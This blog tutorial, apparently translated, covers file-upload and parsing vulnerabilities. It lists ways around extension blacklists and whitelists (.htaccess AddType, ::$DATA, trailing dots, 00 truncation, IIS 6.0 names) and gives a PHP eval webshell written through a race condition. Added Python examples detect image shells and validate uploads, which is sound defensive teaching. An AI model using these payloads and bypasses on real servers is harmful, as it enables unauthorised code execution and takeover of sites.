Learning record-file upload parsing vulnerability

Note: This article is for academic exchange only and not for any other purpose. Where it falls short, corrections from more experienced readers are welcome.

1. Essence
File upload vulnerabilities come down to bypassing the front-end and back-end restrictions so that a file containing a Trojan (webshell) is stored on the server; parsing vulnerabilities in the web container may also need to be abused so the stored file is executed. Typically a one-line Trojan ("one-sentence Trojan") is uploaded to obtain a webshell, which is then driven with a client tool such as China Chopper.

2. Basic knowledge
1) Simple concepts
webshell: a script that gives the attacker control with the web server's permissions
getshell: obtaining that access
Reverse shell: after the Trojan is planted, the Trojan actively connects back to the attacker
Bind (forward) shell: after the Trojan is planted, the attacker actively connects to the Trojan
Small shell ("pony", 小马): after the Trojan is planted, the attacker connects to it with a client tool; the attack logic is not written into the file itself
Big shell ("Malaysia", 大马): the Trojan file itself contains a large amount of attack code, so no client tool is needed; simply connecting to it is enough to attack

2) How to make an image shell (an image file with the Trojan embedded)
First method: combine the files with a cmd command. copy a.jpg/b + 1.php 123.jpg appends the PHP file to a.jpg as a binary stream and produces the image 123.jpg. (The same trick hides arbitrary data: compress 1.txt into 1.zip first, because opening the result directly would show garbled characters, then run copy a.jpg/b + 1.zip 123.jpg; renaming 123.jpg to .zip lets it be decompressed to recover 1.txt.)

Second method: modify the image directly. Open the image in a hex editor and write the Trojan statement into it.

3) How to tell whether the upload check is a blacklist, a whitelist, or only a front-end restriction
If a .php upload is blocked but a file with an arbitrary extension such as 1.a uploads successfully, it is a blacklist; if that upload also fails, it is a whitelist. If packet capture shows that no request is sent at all when the file is rejected, the interception happens purely in the front end.

4) CGI parsing vulnerabilities
Scope: PHP
Web container: Nginx, IIS, etc.
Essence: for a request such as a/b/c.png/.php the path is resolved from left to right; the file c.png is found, and because the request ends in .php, c.png is handed to the PHP interpreter.

5) IIS 6.0 parsing vulnerabilities
1. By default .asa, .cer and .cdx are parsed as ASP files (try these against a blacklist, then connect with China Chopper to obtain the webshell).

2. Special-character parsing problem: both test.asp;xxx.jpg and test.asp/xxx.jpg are parsed as ASP files (useful against a whitelist, then connect with China Chopper to obtain the webshell).

3. Note: whether the server is an IIS container can usually be determined from the 404 error page.

6) Secondary rendering
The essence of secondary rendering is that the uploaded image is not only inspected but re-encoded, so part of its content is rewritten by the server.
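As an added defender-side example that is not part of the original article: the two image-shell constructions described in section 2) leave different traces, and both can be flagged before any re-encoding is attempted. The Python below (my code, not the author's; the article's own examples are cmd and PHP) checks that the leading bytes match the claimed extension, scans the body for script open tags, and reports bytes appended after the image's end marker, which is exactly what the copy /b method produces. The image bytes are constructed inline and contain only a harmless marker string.

```python
# Added defender-side example; not part of the original article.
# Detects the two image-shell constructions described above: script text appended
# after the image (copy /b) and script text patched into the image with a hex editor.
from typing import List

# Leading bytes each image type must start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# End-of-image markers; anything after them is not image data. GIF's trailer is a
# single 0x3B byte, far too common to locate with a plain scan, so it is left out.
END_MARKER = {
    "jpg": b"\xff\xd9",
    "jpeg": b"\xff\xd9",
    "png": b"IEND\xae\x42\x60\x82",
}

# Script open tags that have no business inside an image. Kept to multi-byte
# sequences so that random binary data rarely triggers them.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%@")


def inspect_image(data: bytes, claimed_ext: str) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    ext = claimed_ext.lower().lstrip(".")
    magics = MAGIC.get(ext)
    if magics is None:
        return [f"extension {claimed_ext!r} is not an allowed image type"]
    if not data.startswith(magics):
        findings.append("magic bytes do not match the claimed extension")
    lowered = data.lower()
    for marker in SCRIPT_MARKERS:
        pos = lowered.find(marker)
        if pos != -1:
            findings.append(f"script marker {marker!r} at offset {pos}")
    end = END_MARKER.get(ext)
    if end is not None:
        last = data.rfind(end)          # rfind skips EOI markers of embedded thumbnails
        if last == -1:
            findings.append("end-of-image marker missing")
        else:
            trailing = len(data) - (last + len(end))
            if trailing > 0:
                findings.append(f"{trailing} bytes after end-of-image marker")
    return findings


# Constructed sample files (not real uploads): a minimal JPEG-shaped byte string.
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 8 + b"\xff\xd9"
# What `copy a.jpg/b + 1.php 123.jpg` produces: image bytes, then script text.
APPENDED = CLEAN_JPEG + b"<?php /* constructed marker only */ ?>"
# What a hex-editor patch produces: script text inside the body, nothing appended.
PATCHED = CLEAN_JPEG[:12] + b"<?php ?>" + CLEAN_JPEG[12 + 8:]

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_JPEG), ("appended", APPENDED), ("patched", PATCHED)):
        print(label, inspect_image(sample, "jpg"))
```

The appended variant is the easy one: the bytes after the end marker are reported with their count. The patched variant passes the magic and end-marker checks and is caught only by the marker scan, which is why re-encoding (secondary rendering) is the stronger control: it rewrites the body rather than looking for known strings in it.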

7) NTFS $DATA streams on Windows
On a Windows system with an NTFS volume, the cmd command echo xxx >> 1.txt:a.txt writes xxx into an alternate data stream named a.txt attached to 1.txt. From the outside 1.txt shows a size of 0 KB; the stream is not listed by dir but appears with dir /R. To open it, run notepad 1.txt:a.txt. Note that 1.txt is equivalent to 1.txt::$DATA; the ::$DATA suffix of the default stream is not displayed.

8) PHP file_put_contents function
In a PHP script, file_put_contents(file, data) writes a string to a file, creating the file if it does not exist.

9) Distributed configuration file .htaccess
The distributed configuration file .htaccess changes the Apache configuration for the directory it sits in. It has many functions, for example custom redirects or blocking IP addresses. It is not enabled by default. When the back-end blacklist is strict and the set of parseable suffixes is limited, uploading a .htaccess that tells the server to parse .png files as PHP bypasses the blacklist and allows the Trojan to be planted (provided .htaccess processing is enabled). On Windows some system versions refuse to create a file named .htaccess in Explorer; use ren 1.txt .htaccess from cmd instead. The directive is AddType application/x-httpd-php .png

3. Bypass methods

Front-end mechanism:
1. Upload the image shell, intercept the request and change the file type. Simpler still: rename the Trojan file to an image suffix, intercept the request and change the suffix back. After the upload succeeds, obtain the image address and connect with a client tool to getshell, or access the URL and issue commands directly (a one-line Trojan is recommended).

Back-end blacklist mechanism (upload the image shell so that the front-end check and the image-header check do not reject it, then find a way around the remaining back-end restrictions):
1) Only the Content-Type field is checked
Upload the image shell, intercept the request and change the suffix (rare).

2) Suffix not covered by the blacklist
Upload files with suffixes such as php3, php4 or jspx.

3) .htaccess not restricted (the feature is off by default, but it may be on)
Upload a .htaccess file containing AddType application/x-httpd-php .png, then upload the PHP file renamed to .png.

4) Case not normalised
Only very old web containers were case sensitive: there, a blacklist that blocks php cannot be bypassed by uploading .PHP, because the container will not parse it either. In newer versions uploading .PHP gets past a blacklist entry of php, and the container, being case-insensitive, still parses the file as PHP, which achieves the bypass.

5) Trailing spaces and dots not processed
Intercept the request and change the file name to something like "1.php " or "1.php.". Windows drops trailing spaces and dots when the file is saved, so the stored file is 1.php and is recognised as PHP (the dot variant works only against a Windows back end).

6) ::$DATA not processed
On an NTFS volume under Windows a file's default data stream is ::$DATA, and Windows does not display it: 1.txt is the same as 1.txt::$DATA. If the back end runs on Windows and the blacklist does not account for this, a suffix such as 1.php::$DATA can be uploaded and is stored and parsed as 1.php.

7) Spaces and dots stripped only once, not in a loop
Intercept the request and change the suffix; a construction such as ". ." (dot, space, dot) survives a single stripping pass and can be tried as a bypass.

8) Blacklisted string replaced with empty, but not in a loop
Intercept the request and change the suffix to something like pphphp. The back end scans left to right, removes the first php it finds and does not re-check the result, leaving php behind and achieving the bypass.

9) If IIS 6.0 vulnerabilities are present
By default .asa, .cer and .cdx are parsed as ASP files: upload the Trojan with one of these suffixes, then connect with China Chopper to obtain the webshell.

Back-end whitelist mechanism (upload the image shell so that the front-end check and the image-header check do not reject it, then find a way around the remaining back-end restrictions; most whitelists are bypassed through some other vulnerability):
1) A save-path or save-filename field is found when intercepting the request
If a save-path field is found, it is usually in the URL. Use 00 truncation to bypass it: % is needed as the hexadecimal marker in the URL, and this applies to Windows back ends. Appending 1.php%00 to the save path makes the uploaded image shell be parsed as PHP.

If a save-filename field is found, 00 truncation also works, but it must be done in the hex view: send a name such as 1.phpa, locate the a (hex 61) and change it to 00; the uploaded image shell is then parsed as PHP. Again this applies to Windows back ends.

2) If a CGI parsing vulnerability is present
Upload the image shell as 1.jpg and append /.php when requesting it, so the URL ends in 1.jpg/.php, which achieves the bypass. If the back end re-renders uploaded files, upload a GIF, compare the stored copy with the original to find the region that was not modified, write the Trojan into that region with a hex editor, and combine it with the CGI vulnerability.

3) Logic flaw: the file is saved before it is checked
Upload handlers either check first and save second, or save first and check second. In the second case the gap between saving and deletion can be used to create a Trojan file; this is called a race condition. A PHP script using file_put_contents(file, data), for example <?php file_put_contents('10.php','<?php @eval($_REQUEST[1]); ?>'); ?>, creates the Trojan file 10.php when it is requested. Burp is recommended for this; when configuring it, set the request rate for accessing the file lower than the upload rate.
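As an added defender-side example that is not part of the original article: the save-first-check-second window above only exists because the upload is written to a web-served path under a client-chosen name before it is checked. The Python below (my code, not the author's, and not the handler of any particular project) closes it by staging the upload in a directory the web server does not serve, checking the bytes on disk there, and only then publishing it atomically under a server-generated name. The directory names and the allowlist are assumptions of the example; the uploads are constructed byte strings.

```python
# Added defender-side example; not part of the original article.
# Closes the save-then-check window: an upload never exists at a web-served path under
# a client-chosen name. It is staged where the server does not serve, checked there,
# and then published atomically under a name the client never saw.
import os
import secrets
import tempfile
from typing import Optional

# Constructed allowlist: extension -> required leading bytes.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def store_upload(data: bytes, claimed_ext: str, staging_dir: str, public_dir: str) -> Optional[str]:
    """Return the published path, or None if the upload was rejected.

    staging_dir must not be reachable through the web server, and it must be on the
    same filesystem as public_dir so that os.replace is a single atomic rename."""
    ext = claimed_ext.lower().lstrip(".")
    # 1. Write to staging first, under a random name with mode 0600, so a concurrent
    #    request cannot fetch the file while it is still being checked.
    fd, staged = tempfile.mkstemp(dir=staging_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        # 2. Judge the bytes that actually landed on disk, not the client's claims.
        magic = ALLOWED.get(ext)
        with open(staged, "rb") as fh:
            head = fh.read(16)
        if magic is None or not head.startswith(magic):
            return None
        # 3. Publish atomically; the name is chosen by the server, never by the client.
        final = os.path.join(public_dir, f"{secrets.token_hex(16)}.{ext}")
        os.replace(staged, final)
        return final
    finally:
        # Whatever happened above, nothing is left behind in staging.
        if os.path.exists(staged):
            os.unlink(staged)


def demo() -> dict:
    """Run two constructed uploads through store_upload in throwaway directories."""
    base = tempfile.mkdtemp()
    staging = os.path.join(base, "staging")   # stands in for a directory outside the web root
    public = os.path.join(base, "public")     # stands in for the served upload directory
    os.mkdir(staging)
    os.mkdir(public)
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32            # constructed, plausible image
    fake = b"<?php /* constructed marker only */ ?>"     # script text claiming to be a JPEG
    accepted = store_upload(png, "PNG", staging, public)
    rejected = store_upload(fake, "jpg", staging, public)
    return {
        "accepted_published": accepted is not None and os.path.isfile(accepted),
        "accepted_in_public": accepted is not None and os.path.dirname(accepted) == public,
        "accepted_ext": accepted is not None and accepted.endswith(".png"),
        "rejected": rejected is None,
        "staging_empty": os.listdir(staging) == [],
        "public_count": len(os.listdir(public)),
    }


if __name__ == "__main__":
    print(demo())
```

Even a request that arrives at the exact moment of the upload finds nothing to fetch: before the rename the file is outside the served tree, and after it the file carries an image extension and a random name, so the 10.php trick above has no path to hit.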

4) If IIS 6.0 vulnerabilities are present
Special symbols cause parsing problems: both test.asp;xxx.jpg and test.asp/xxx.jpg are parsed as ASP files. Upload accordingly, then connect with China Chopper to obtain the webshell.
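As an added defender-side example that is not part of the original article: every file-name bypass in the blacklist section (items 2 to 8) and in the whitelist section (00 truncation, the IIS ; trick) works against a check that inspects the client's name as typed and then tries to sanitise it. The Python below (my code, not the author's) puts that kind of check beside an allowlist check that judges the name as the filesystem will store it and never sanitises anything: the stored name is a server token plus the validated extension. The names in BYPASS_NAMES are constructed from the items above; the allowlist is an assumption of the example.

```python
# Added defender-side example; not part of the original article.
# Side by side: the blacklist check that items 2) to 8) above defeat, and an allowlist
# check that does not try to clean the client's name at all.
from typing import Optional

BLACKLIST = {"php", "asp", "jsp"}          # what a naive handler refuses
ALLOWED = {"jpg", "jpeg", "png", "gif"}    # what the hardened handler accepts


def naive_blacklist_accepts(client_name: str) -> bool:
    """Weak check: takes whatever follows the last dot, compares it case-sensitively
    and otherwise trusts the name. Every name in BYPASS_NAMES gets through it."""
    ext = client_name.rsplit(".", 1)[-1] if "." in client_name else ""
    return ext not in BLACKLIST


def validated_extension(client_name: str) -> Optional[str]:
    """Return the lower-case extension if, and only if, it is on the allowlist.
    The name is judged as the filesystem will store it, not as the client sent it."""
    name = client_name
    # NUL (what %00 truncation becomes after decoding) and other control characters
    # never belong in a file name.
    if any(ord(ch) < 0x20 for ch in name):
        return None
    # Path separators, the IIS ';' trick, NTFS ':' streams (::$DATA) and raw percent
    # encoding are refused outright rather than decoded or stripped.
    if any(ch in name for ch in "/\\:;%"):
        return None
    # Windows drops trailing dots and spaces on save, so "1.php." and "1.php " become
    # 1.php on disk; judge the name after the same normalisation. rstrip removes the
    # whole trailing run, so ". ." style padding collapses as well.
    name = name.rstrip(". ")
    # Dot-files such as .htaccess have no extension; they are configuration, not uploads.
    if not name or name.startswith(".") or "." not in name:
        return None
    ext = name.rsplit(".", 1)[1].lower()   # case-insensitive, so .PHP is still php
    return ext if ext in ALLOWED else None


def stored_name(client_name: str, token: str) -> Optional[str]:
    """The name actually written to disk: server token plus validated extension.
    The client's base name, double extensions included, is discarded, and because
    nothing is ever replaced in the name there is no pphphp-style residue to exploit."""
    ext = validated_extension(client_name)
    return None if ext is None else f"{token}.{ext}"


# Constructed names, one per bypass described above.
BYPASS_NAMES = [
    "1.php3",           # blacklist 2) suffix not on the list
    ".htaccess",        # blacklist 3) configuration file
    "1.PHP",            # blacklist 4) case
    "1.php.",           # blacklist 5) trailing dot
    "1.php ",           # blacklist 5) trailing space
    "1.php::$DATA",     # blacklist 6) NTFS stream
    "1.php. .",         # blacklist 7) dot space dot
    "1.php\x00.jpg",    # whitelist 1) 00 truncation, after decoding
    "1.php%00.jpg",     # whitelist 1) 00 truncation, raw
    "1.asp;1.jpg",      # whitelist 4) IIS 6.0 semicolon
]


def naive_accepts_all() -> bool:
    return all(naive_blacklist_accepts(n) for n in BYPASS_NAMES)


def hardened_rejects_all() -> bool:
    return all(validated_extension(n) is None for n in BYPASS_NAMES)


if __name__ == "__main__":
    for n in BYPASS_NAMES:
        print(repr(n), naive_blacklist_accepts(n), stored_name(n, "a1b2c3"))
    print(stored_name("holiday.JPG", "a1b2c3"))
```

The CGI case (1.jpg/.php) is deliberately absent from the list: it is a request path, not a file name, and no upload-time check can address it. That one is fixed in the container configuration by not handing non-PHP files to the interpreter.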


Origin blog.csdn.net/SmileAndFun/article/details/108320741